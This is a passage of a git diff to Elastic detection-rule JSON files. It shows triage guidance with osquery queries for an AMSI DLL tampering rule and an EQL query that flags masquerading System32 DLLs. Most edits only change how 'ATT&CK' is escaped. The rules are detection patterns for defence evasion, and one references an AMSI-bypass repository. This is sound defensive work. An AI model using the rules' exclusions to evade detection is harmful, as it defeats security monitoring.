investigation steps\n\n- Identify the process that created the DLL and which account was used.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the execution of scripts and macros after the registry modification.\n- Investigate other processes launched from the directory that the DLL was created.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team as these modifications expose the host to malware infections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and file.path != null and\n file.name : (\"amsi.dll\", \"amsi\") and not file.path : (\"?:\\\\Windows\\\\system32\\\\amsi.dll\", \"?:\\\\Windows\\\\Syswow64\\\\amsi.dll\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSXS\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\servicing\\\\LCU\\\\*\", \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\\\\*\", \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_1.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_1.json index b4318937871..7c90110ee55 100644 --- a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_1.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_2.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_2.json index 09ea9f0c10f..47e44280c82 100644 --- a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_2.json +++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_2.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_3.json b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_3.json index 8ef10308409..7b40b1ea815 100644 --- a/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_3.json +++ b/packages/security_detection_engine/kibana/security_rule/fac52c69-2646-4e79-89c0-fd7653461010_3.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_1.json b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_1.json index af7d8b2dd85..c08a7abd94a 100644 --- a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_1.json +++ b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_102.json b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_102.json index 166ccbd32c8..8fb2a7509fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_102.json +++ b/packages/security_detection_engine/kibana/security_rule/fb01d790-9f74-4e76-97dd-b4b0f7bf6435_102.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Masquerading as System32 DLL", - "query": "library where event.action == \"load\" and dll.Ext.relative_file_creation_time \u003c= 3600 and\n not (\n dll.path : (\n \"?:\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\Windows\\\\SysWOW64\\\\*\",\n \"?:\\\\Windows\\\\SystemTemp\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\NewOS\\\\Windows\\\\System32\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Sources\\\\*\",\n \"?:\\\\$WINDOWS.~BT\\\\Work\\\\*\",\n \"?:\\\\Windows\\\\WinSxS\\\\*\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\*\",\n \"?:\\\\Windows\\\\assembly\\\\NativeImages_v*\"\n )\n ) and\n not (\n dll.code_signature.subject_name in (\n \"Microsoft Windows\",\n \"Microsoft Corporation\",\n \"Microsoft Windows Hardware Abstraction Layer Publisher\",\n \"Microsoft Windows Publisher\",\n \"Microsoft Windows 3rd party Component\",\n \"Microsoft 3rd Party Application Component\"\n ) and dll.code_signature.trusted == true\n ) and not dll.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n dll.name : (\n \"aadauthhelper.dll\", \"aadcloudap.dll\", \"aadjcsp.dll\", \"aadtb.dll\", \"aadwamextension.dll\", \"aarsvc.dll\", \"abovelockapphost.dll\", \"accessibilitycpl.dll\", \"accountaccessor.dll\", \"accountsrt.dll\", \"acgenral.dll\", \"aclayers.dll\", \"acledit.dll\", \"aclui.dll\", \"acmigration.dll\", \"acppage.dll\", \"acproxy.dll\", \"acspecfc.dll\", \"actioncenter.dll\", \"actioncentercpl.dll\", \"actionqueue.dll\", \"activationclient.dll\", \"activeds.dll\", \"activesynccsp.dll\", \"actxprxy.dll\", \"acwinrt.dll\", \"acxtrnal.dll\", \"adaptivecards.dll\", \"addressparser.dll\", \"adhapi.dll\", \"adhsvc.dll\", \"admtmpl.dll\", \"adprovider.dll\", \"adrclient.dll\", \"adsldp.dll\", \"adsldpc.dll\", \"adsmsext.dll\", \"adsnt.dll\", \"adtschema.dll\", \"advancedemojids.dll\", \"advapi32.dll\", \"advapi32res.dll\", \"advpack.dll\", \"aeevts.dll\", \"aeinv.dll\", \"aepic.dll\", \"ajrouter.dll\", \"altspace.dll\", \"amsi.dll\", \"amsiproxy.dll\", \"amstream.dll\", \"apds.dll\", \"aphostclient.dll\", \"aphostres.dll\", \"aphostservice.dll\", \"apisampling.dll\", \"apisetschema.dll\", \"apmon.dll\", \"apmonui.dll\", \"appcontracts.dll\", \"appextension.dll\", \"apphelp.dll\", \"apphlpdm.dll\", \"appidapi.dll\", \"appidsvc.dll\", \"appinfo.dll\", \"appinfoext.dll\", \"applicationframe.dll\", \"applockercsp.dll\", \"appmgmts.dll\", \"appmgr.dll\", \"appmon.dll\", \"appointmentapis.dll\", \"appraiser.dll\", \"appreadiness.dll\", \"apprepapi.dll\", \"appresolver.dll\", \"appsruprov.dll\", \"appvcatalog.dll\", \"appvclientps.dll\", \"appvetwclientres.dll\", \"appvintegration.dll\", \"appvmanifest.dll\", \"appvpolicy.dll\", \"appvpublishing.dll\", \"appvreporting.dll\", \"appvscripting.dll\", \"appvsentinel.dll\", \"appvstreamingux.dll\", \"appvstreammap.dll\", \"appvterminator.dll\", \"appxalluserstore.dll\", \"appxpackaging.dll\", \"appxsip.dll\", \"appxsysprep.dll\", \"archiveint.dll\", \"asferror.dll\", \"aspnet_counters.dll\", \"asycfilt.dll\", \"atl.dll\", \"atlthunk.dll\", \"atmlib.dll\", \"audioeng.dll\", \"audiohandlers.dll\", \"audiokse.dll\", \"audioses.dll\", \"audiosrv.dll\", \"auditcse.dll\", \"auditpolcore.dll\", \"auditpolmsg.dll\", \"authbroker.dll\", \"authbrokerui.dll\", \"authentication.dll\", \"authext.dll\", \"authfwcfg.dll\", \"authfwgp.dll\", \"authfwsnapin.dll\", \"authfwwizfwk.dll\", \"authhostproxy.dll\", \"authui.dll\", \"authz.dll\", \"autopilot.dll\", \"autopilotdiag.dll\", \"autoplay.dll\", \"autotimesvc.dll\", \"avicap32.dll\", \"avifil32.dll\", \"avrt.dll\", \"axinstsv.dll\", \"azroles.dll\", \"azroleui.dll\", \"azsqlext.dll\", \"basecsp.dll\", \"basesrv.dll\", \"batmeter.dll\", \"bcastdvrbroker.dll\", \"bcastdvrclient.dll\", \"bcastdvrcommon.dll\", \"bcd.dll\", \"bcdprov.dll\", \"bcdsrv.dll\", \"bcp47langs.dll\", \"bcp47mrm.dll\", \"bcrypt.dll\", \"bcryptprimitives.dll\", \"bdehdcfglib.dll\", \"bderepair.dll\", \"bdesvc.dll\", \"bdesysprep.dll\", \"bdeui.dll\", \"bfe.dll\", \"bi.dll\", \"bidispl.dll\", \"bindfltapi.dll\", \"bingasds.dll\", \"bingfilterds.dll\", \"bingmaps.dll\", \"biocredprov.dll\", \"bisrv.dll\", \"bitlockercsp.dll\", \"bitsigd.dll\", \"bitsperf.dll\", \"bitsproxy.dll\", \"biwinrt.dll\", \"blbevents.dll\", \"blbres.dll\", \"blb_ps.dll\", \"bluetoothapis.dll\", \"bnmanager.dll\", \"bootmenuux.dll\", \"bootstr.dll\", \"bootux.dll\", \"bootvid.dll\", \"bridgeres.dll\", \"brokerlib.dll\", \"browcli.dll\", \"browserbroker.dll\", \"browseui.dll\", \"btagservice.dll\", \"bthavctpsvc.dll\", \"bthavrcp.dll\", \"bthavrcpappsvc.dll\", \"bthci.dll\", \"bthpanapi.dll\", \"bthradiomedia.dll\", \"bthserv.dll\", \"bthtelemetry.dll\", \"btpanui.dll\", \"bwcontexthandler.dll\", \"cabapi.dll\", \"cabinet.dll\", \"cabview.dll\", \"callbuttons.dll\", \"cameracaptureui.dll\", \"capauthz.dll\", \"capiprovider.dll\", \"capisp.dll\", \"captureservice.dll\", \"castingshellext.dll\", \"castlaunch.dll\", \"catsrv.dll\", \"catsrvps.dll\", \"catsrvut.dll\", \"cbdhsvc.dll\", \"cca.dll\", \"cdd.dll\", \"cdosys.dll\", \"cdp.dll\", \"cdprt.dll\", \"cdpsvc.dll\", \"cdpusersvc.dll\", \"cemapi.dll\", \"certca.dll\", \"certcli.dll\", \"certcredprovider.dll\", \"certenc.dll\", \"certenroll.dll\", \"certenrollui.dll\", \"certmgr.dll\", \"certpkicmdlet.dll\", \"certpoleng.dll\", \"certprop.dll\", \"cewmdm.dll\", \"cfgbkend.dll\", \"cfgmgr32.dll\", \"cfgspcellular.dll\", \"cfgsppolicy.dll\", \"cflapi.dll\", \"cfmifs.dll\", \"cfmifsproxy.dll\", \"chakra.dll\", \"chakradiag.dll\", \"chakrathunk.dll\", \"chartv.dll\", \"chatapis.dll\", \"chkwudrv.dll\", \"chsstrokeds.dll\", \"chtbopomofods.dll\", \"chtcangjieds.dll\", \"chthkstrokeds.dll\", \"chtquickds.dll\", \"chxapds.dll\", \"chxdecoder.dll\", \"chxhapds.dll\", \"chxinputrouter.dll\", \"chxranker.dll\", \"ci.dll\", \"cic.dll\", \"cimfs.dll\", \"circoinst.dll\", \"ciwmi.dll\", \"clb.dll\", \"clbcatq.dll\", \"cldapi.dll\", \"cleanpccsp.dll\", \"clfsw32.dll\", \"cliconfg.dll\", \"clipboardserver.dll\", \"clipc.dll\", \"clipsvc.dll\", \"clipwinrt.dll\", \"cloudap.dll\", \"cloudidsvc.dll\", \"clrhost.dll\", \"clusapi.dll\", \"cmcfg32.dll\", \"cmdext.dll\", \"cmdial32.dll\", \"cmgrcspps.dll\", \"cmifw.dll\", \"cmintegrator.dll\", \"cmlua.dll\", \"cmpbk32.dll\", \"cmstplua.dll\", \"cmutil.dll\", \"cngcredui.dll\", \"cngprovider.dll\", \"cnvfat.dll\", \"cofiredm.dll\", \"colbact.dll\", \"colorcnv.dll\", \"colorui.dll\", \"combase.dll\", \"comcat.dll\", \"comctl32.dll\", \"comdlg32.dll\", \"coml2.dll\", \"comppkgsup.dll\", \"compstui.dll\", \"computecore.dll\", \"computenetwork.dll\", \"computestorage.dll\", \"comrepl.dll\", \"comres.dll\", \"comsnap.dll\", \"comsvcs.dll\", \"comuid.dll\", \"configmanager2.dll\", \"conhostv1.dll\", \"connect.dll\", \"consentux.dll\", \"consentuxclient.dll\", \"console.dll\", \"consolelogon.dll\", \"contactapis.dll\", \"container.dll\", \"coredpus.dll\", \"coreglobconfig.dll\", \"coremas.dll\", \"coremessaging.dll\", \"coremmres.dll\", \"coreshell.dll\", \"coreshellapi.dll\", \"coreuicomponents.dll\", \"correngine.dll\", \"courtesyengine.dll\", \"cpfilters.dll\", \"creddialogbroker.dll\", \"credprovhelper.dll\", \"credprovhost.dll\", \"credprovs.dll\", \"credprovslegacy.dll\", \"credssp.dll\", \"credui.dll\", \"crypt32.dll\", \"cryptbase.dll\", \"cryptcatsvc.dll\", \"cryptdlg.dll\", \"cryptdll.dll\", \"cryptext.dll\", \"cryptnet.dll\", \"cryptngc.dll\", \"cryptowinrt.dll\", \"cryptsp.dll\", \"cryptsvc.dll\", \"crypttpmeksvc.dll\", \"cryptui.dll\", \"cryptuiwizard.dll\", \"cryptxml.dll\", \"cscapi.dll\", \"cscdll.dll\", \"cscmig.dll\", \"cscobj.dll\", \"cscsvc.dll\", \"cscui.dll\", \"csplte.dll\", \"cspproxy.dll\", \"csrsrv.dll\", \"cxcredprov.dll\", \"c_g18030.dll\", \"c_gsm7.dll\", \"c_is2022.dll\", \"c_iscii.dll\", \"d2d1.dll\", \"d3d10.dll\", \"d3d10core.dll\", \"d3d10level9.dll\", \"d3d10warp.dll\", \"d3d10_1.dll\", \"d3d10_1core.dll\", \"d3d11.dll\", \"d3d11on12.dll\", \"d3d12.dll\", \"d3d12core.dll\", \"d3d8thk.dll\", \"d3d9.dll\", \"d3d9on12.dll\", \"d3dscache.dll\", \"dab.dll\", \"dabapi.dll\", \"daconn.dll\", \"dafbth.dll\", \"dafdnssd.dll\", \"dafescl.dll\", \"dafgip.dll\", \"dafiot.dll\", \"dafipp.dll\", \"dafmcp.dll\", \"dafpos.dll\", \"dafprintprovider.dll\", \"dafupnp.dll\", \"dafwcn.dll\", \"dafwfdprovider.dll\", \"dafwiprov.dll\", \"dafwsd.dll\", \"damediamanager.dll\", \"damm.dll\", \"das.dll\", \"dataclen.dll\", \"datusage.dll\", \"davclnt.dll\", \"davhlpr.dll\", \"davsyncprovider.dll\", \"daxexec.dll\", \"dbgcore.dll\", \"dbgeng.dll\", \"dbghelp.dll\", \"dbgmodel.dll\", \"dbnetlib.dll\", \"dbnmpntw.dll\", \"dciman32.dll\", \"dcntel.dll\", \"dcomp.dll\", \"ddaclsys.dll\", \"ddcclaimsapi.dll\", \"ddds.dll\", \"ddisplay.dll\", \"ddoiproxy.dll\", \"ddores.dll\", \"ddpchunk.dll\", \"ddptrace.dll\", \"ddputils.dll\", \"ddp_ps.dll\", \"ddraw.dll\", \"ddrawex.dll\", \"defragproxy.dll\", \"defragres.dll\", \"defragsvc.dll\", \"deploymentcsps.dll\", \"deskadp.dll\", \"deskmon.dll\", \"desktopshellext.dll\", \"devenum.dll\", \"deviceaccess.dll\", \"devicecenter.dll\", \"devicecredential.dll\", \"devicepairing.dll\", \"deviceuxres.dll\", \"devinv.dll\", \"devmgr.dll\", \"devobj.dll\", \"devpropmgr.dll\", \"devquerybroker.dll\", \"devrtl.dll\", \"dfdts.dll\", \"dfscli.dll\", \"dfshim.dll\", \"dfsshlex.dll\", \"dggpext.dll\", \"dhcpcmonitor.dll\", \"dhcpcore.dll\", \"dhcpcore6.dll\", \"dhcpcsvc.dll\", \"dhcpcsvc6.dll\", \"dhcpsapi.dll\", \"diagcpl.dll\", \"diagnosticlogcsp.dll\", \"diagperf.dll\", \"diagsvc.dll\", \"diagtrack.dll\", \"dialclient.dll\", \"dialserver.dll\", \"dictationmanager.dll\", \"difxapi.dll\", \"dimsjob.dll\", \"dimsroam.dll\", \"dinput.dll\", \"dinput8.dll\", \"direct2ddesktop.dll\", \"directml.dll\", \"discan.dll\", \"dismapi.dll\", \"dispbroker.dll\", \"dispex.dll\", \"display.dll\", \"displaymanager.dll\", \"dlnashext.dll\", \"dmappsres.dll\", \"dmcfgutils.dll\", \"dmcmnutils.dll\", \"dmcsps.dll\", \"dmdlgs.dll\", \"dmdskmgr.dll\", \"dmdskres.dll\", \"dmdskres2.dll\", \"dmenrollengine.dll\", \"dmintf.dll\", \"dmiso8601utils.dll\", \"dmloader.dll\", \"dmocx.dll\", \"dmoleaututils.dll\", \"dmpushproxy.dll\", \"dmpushroutercore.dll\", \"dmrcdecoder.dll\", \"dmrserver.dll\", \"dmsynth.dll\", \"dmusic.dll\", \"dmutil.dll\", \"dmvdsitf.dll\", \"dmwappushsvc.dll\", \"dmwmicsp.dll\", \"dmxmlhelputils.dll\", \"dnsapi.dll\", \"dnscmmc.dll\", \"dnsext.dll\", \"dnshc.dll\", \"dnsrslvr.dll\", \"docprop.dll\", \"dolbydecmft.dll\", \"domgmt.dll\", \"dosettings.dll\", \"dosvc.dll\", \"dot3api.dll\", \"dot3cfg.dll\", \"dot3conn.dll\", \"dot3dlg.dll\", \"dot3gpclnt.dll\", \"dot3gpui.dll\", \"dot3hc.dll\", \"dot3mm.dll\", \"dot3msm.dll\", \"dot3svc.dll\", \"dot3ui.dll\", \"dpapi.dll\", \"dpapiprovider.dll\", \"dpapisrv.dll\", \"dpnaddr.dll\", \"dpnathlp.dll\", \"dpnet.dll\", \"dpnhpast.dll\", \"dpnhupnp.dll\", \"dpnlobby.dll\", \"dps.dll\", \"dpx.dll\", \"drprov.dll\", \"drt.dll\", \"drtprov.dll\", \"drttransport.dll\", \"drvsetup.dll\", \"drvstore.dll\", \"dsauth.dll\", \"dsccore.dll\", \"dsccoreconfprov.dll\", \"dsclient.dll\", \"dscproxy.dll\", \"dsctimer.dll\", \"dsdmo.dll\", \"dskquota.dll\", \"dskquoui.dll\", \"dsound.dll\", \"dsparse.dll\", \"dsprop.dll\", \"dsquery.dll\", \"dsreg.dll\", \"dsregtask.dll\", \"dsrole.dll\", \"dssec.dll\", \"dssenh.dll\", \"dssvc.dll\", \"dsui.dll\", \"dsuiext.dll\", \"dswave.dll\", \"dtsh.dll\", \"ducsps.dll\", \"dui70.dll\", \"duser.dll\", \"dusmapi.dll\", \"dusmsvc.dll\", \"dwmapi.dll\", \"dwmcore.dll\", \"dwmghost.dll\", \"dwminit.dll\", \"dwmredir.dll\", \"dwmscene.dll\", \"dwrite.dll\", \"dxcore.dll\", \"dxdiagn.dll\", \"dxgi.dll\", \"dxgwdi.dll\", \"dxilconv.dll\", \"dxmasf.dll\", \"dxp.dll\", \"dxpps.dll\", \"dxptasksync.dll\", \"dxtmsft.dll\", \"dxtrans.dll\", \"dxva2.dll\", \"dynamoapi.dll\", \"eapp3hst.dll\", \"eappcfg.dll\", \"eappcfgui.dll\", \"eappgnui.dll\", \"eapphost.dll\", \"eappprxy.dll\", \"eapprovp.dll\", \"eapputil.dll\", \"eapsimextdesktop.dll\", \"eapsvc.dll\", \"eapteapauth.dll\", \"eapteapconfig.dll\", \"eapteapext.dll\", \"easconsent.dll\", \"easwrt.dll\", \"edgeangle.dll\", \"edgecontent.dll\", \"edgehtml.dll\", \"edgeiso.dll\", \"edgemanager.dll\", \"edpauditapi.dll\", \"edpcsp.dll\", \"edptask.dll\", \"edputil.dll\", \"eeprov.dll\", \"eeutil.dll\", \"efsadu.dll\", \"efscore.dll\", \"efsext.dll\", \"efslsaext.dll\", \"efssvc.dll\", \"efsutil.dll\", \"efswrt.dll\", \"ehstorapi.dll\", \"ehstorpwdmgr.dll\", \"ehstorshell.dll\", \"els.dll\", \"elscore.dll\", \"elshyph.dll\", \"elslad.dll\", \"elstrans.dll\", \"emailapis.dll\", \"embeddedmodesvc.dll\", \"emojids.dll\", \"encapi.dll\", \"energy.dll\", \"energyprov.dll\", \"energytask.dll\", \"enrollmentapi.dll\", \"enterpriseapncsp.dll\", \"enterprisecsps.dll\", \"enterpriseetw.dll\", \"eqossnap.dll\", \"errordetails.dll\", \"errordetailscore.dll\", \"es.dll\", \"esclprotocol.dll\", \"esclscan.dll\", \"esclwiadriver.dll\", \"esdsip.dll\", \"esent.dll\", \"esentprf.dll\", \"esevss.dll\", \"eshims.dll\", \"etwrundown.dll\", \"euiccscsp.dll\", \"eventaggregation.dll\", \"eventcls.dll\", \"evr.dll\", \"execmodelclient.dll\", \"execmodelproxy.dll\", \"explorerframe.dll\", \"exsmime.dll\", \"extrasxmlparser.dll\", \"f3ahvoas.dll\", \"facilitator.dll\", \"familysafetyext.dll\", \"faultrep.dll\", \"fcon.dll\", \"fdbth.dll\", \"fdbthproxy.dll\", \"fddevquery.dll\", \"fde.dll\", \"fdeploy.dll\", \"fdphost.dll\", \"fdpnp.dll\", \"fdprint.dll\", \"fdproxy.dll\", \"fdrespub.dll\", \"fdssdp.dll\", \"fdwcn.dll\", \"fdwnet.dll\", \"fdwsd.dll\", \"feclient.dll\", \"ffbroker.dll\", \"fhcat.dll\", \"fhcfg.dll\", \"fhcleanup.dll\", \"fhcpl.dll\", \"fhengine.dll\", \"fhevents.dll\", \"fhshl.dll\", \"fhsrchapi.dll\", \"fhsrchph.dll\", \"fhsvc.dll\", \"fhsvcctl.dll\", \"fhtask.dll\", \"fhuxadapter.dll\", \"fhuxapi.dll\", \"fhuxcommon.dll\", \"fhuxgraphics.dll\", \"fhuxpresentation.dll\", \"fidocredprov.dll\", \"filemgmt.dll\", \"filterds.dll\", \"findnetprinters.dll\", \"firewallapi.dll\", \"flightsettings.dll\", \"fltlib.dll\", \"fluencyds.dll\", \"fmapi.dll\", \"fmifs.dll\", \"fms.dll\", \"fntcache.dll\", \"fontext.dll\", \"fontprovider.dll\", \"fontsub.dll\", \"fphc.dll\", \"framedyn.dll\", \"framedynos.dll\", \"frameserver.dll\", \"frprov.dll\", \"fsutilext.dll\", \"fthsvc.dll\", \"fundisc.dll\", \"fveapi.dll\", \"fveapibase.dll\", \"fvecerts.dll\", \"fvecpl.dll\", \"fveskybackup.dll\", \"fveui.dll\", \"fvewiz.dll\", \"fwbase.dll\", \"fwcfg.dll\", \"fwmdmcsp.dll\", \"fwpolicyiomgr.dll\", \"fwpuclnt.dll\", \"fwremotesvr.dll\", \"gameinput.dll\", \"gamemode.dll\", \"gamestreamingext.dll\", \"gameux.dll\", \"gamingtcui.dll\", \"gcdef.dll\", \"gdi32.dll\", \"gdi32full.dll\", \"gdiplus.dll\", \"generaltel.dll\", \"geocommon.dll\", \"geolocation.dll\", \"getuname.dll\", \"glmf32.dll\", \"globinputhost.dll\", \"glu32.dll\", \"gmsaclient.dll\", \"gpapi.dll\", \"gpcsewrappercsp.dll\", \"gpedit.dll\", \"gpprefcl.dll\", \"gpprnext.dll\", \"gpscript.dll\", \"gpsvc.dll\", \"gptext.dll\", \"graphicscapture.dll\", \"graphicsperfsvc.dll\", \"groupinghc.dll\", \"hal.dll\", \"halextpl080.dll\", \"hascsp.dll\", \"hashtagds.dll\", \"hbaapi.dll\", \"hcproviders.dll\", \"hdcphandler.dll\", \"heatcore.dll\", \"helppaneproxy.dll\", \"hgcpl.dll\", \"hhsetup.dll\", \"hid.dll\", \"hidcfu.dll\", \"hidserv.dll\", \"hlink.dll\", \"hmkd.dll\", \"hnetcfg.dll\", \"hnetcfgclient.dll\", \"hnetmon.dll\", \"hologramworld.dll\", \"holoshellruntime.dll\", \"holoshextensions.dll\", \"hotplug.dll\", \"hrtfapo.dll\", \"httpapi.dll\", \"httpprxc.dll\", \"httpprxm.dll\", \"httpprxp.dll\", \"httpsdatasource.dll\", \"htui.dll\", \"hvhostsvc.dll\", \"hvloader.dll\", \"hvsigpext.dll\", \"hvsocket.dll\", \"hydrogen.dll\", \"ia2comproxy.dll\", \"ias.dll\", \"iasacct.dll\", \"iasads.dll\", \"iasdatastore.dll\", \"iashlpr.dll\", \"iasmigplugin.dll\", \"iasnap.dll\", \"iaspolcy.dll\", \"iasrad.dll\", \"iasrecst.dll\", \"iassam.dll\", \"iassdo.dll\", \"iassvcs.dll\", \"icfupgd.dll\", \"icm32.dll\", \"icmp.dll\", \"icmui.dll\", \"iconcodecservice.dll\", \"icsigd.dll\", \"icsvc.dll\", \"icsvcext.dll\", \"icu.dll\", \"icuin.dll\", \"icuuc.dll\", \"idctrls.dll\", \"idlisten.dll\", \"idndl.dll\", \"idstore.dll\", \"ieadvpack.dll\", \"ieapfltr.dll\", \"iedkcs32.dll\", \"ieframe.dll\", \"iemigplugin.dll\", \"iepeers.dll\", \"ieproxy.dll\", \"iernonce.dll\", \"iertutil.dll\", \"iesetup.dll\", \"iesysprep.dll\", \"ieui.dll\", \"ifmon.dll\", \"ifsutil.dll\", \"ifsutilx.dll\", \"igddiag.dll\", \"ihds.dll\", \"ikeext.dll\", \"imagehlp.dll\", \"imageres.dll\", \"imagesp1.dll\", \"imapi.dll\", \"imapi2.dll\", \"imapi2fs.dll\", \"imgutil.dll\", \"imm32.dll\", \"implatsetup.dll\", \"indexeddblegacy.dll\", \"inetcomm.dll\", \"inetmib1.dll\", \"inetpp.dll\", \"inetppui.dll\", \"inetres.dll\", \"inked.dll\", \"inkobjcore.dll\", \"inproclogger.dll\", \"input.dll\", \"inputcloudstore.dll\", \"inputcontroller.dll\", \"inputhost.dll\", \"inputservice.dll\", \"inputswitch.dll\", \"inseng.dll\", \"installservice.dll\", \"internetmail.dll\", \"internetmailcsp.dll\", \"invagent.dll\", \"iologmsg.dll\", \"iphlpapi.dll\", \"iphlpsvc.dll\", \"ipnathlp.dll\", \"ipnathlpclient.dll\", \"ippcommon.dll\", \"ippcommonproxy.dll\", \"iprtprio.dll\", \"iprtrmgr.dll\", \"ipsecsnp.dll\", \"ipsecsvc.dll\", \"ipsmsnap.dll\", \"ipxlatcfg.dll\", \"iri.dll\", \"iscsicpl.dll\", \"iscsidsc.dll\", \"iscsied.dll\", \"iscsiexe.dll\", \"iscsilog.dll\", \"iscsium.dll\", \"iscsiwmi.dll\", \"iscsiwmiv2.dll\", \"ism.dll\", \"itircl.dll\", \"itss.dll\", \"iuilp.dll\", \"iumbase.dll\", \"iumcrypt.dll\", \"iumdll.dll\", \"iumsdk.dll\", \"iyuv_32.dll\", \"joinproviderol.dll\", \"joinutil.dll\", \"jpmapcontrol.dll\", \"jpndecoder.dll\", \"jpninputrouter.dll\", \"jpnranker.dll\", \"jpnserviceds.dll\", \"jscript.dll\", \"jscript9.dll\", \"jscript9diag.dll\", \"jsproxy.dll\", \"kbd101.dll\", \"kbd101a.dll\", \"kbd101b.dll\", \"kbd101c.dll\", \"kbd103.dll\", \"kbd106.dll\", \"kbd106n.dll\", \"kbda1.dll\", \"kbda2.dll\", \"kbda3.dll\", \"kbdadlm.dll\", \"kbdal.dll\", \"kbdarme.dll\", \"kbdarmph.dll\", \"kbdarmty.dll\", \"kbdarmw.dll\", \"kbdax2.dll\", \"kbdaze.dll\", \"kbdazel.dll\", \"kbdazst.dll\", \"kbdbash.dll\", \"kbdbe.dll\", \"kbdbene.dll\", 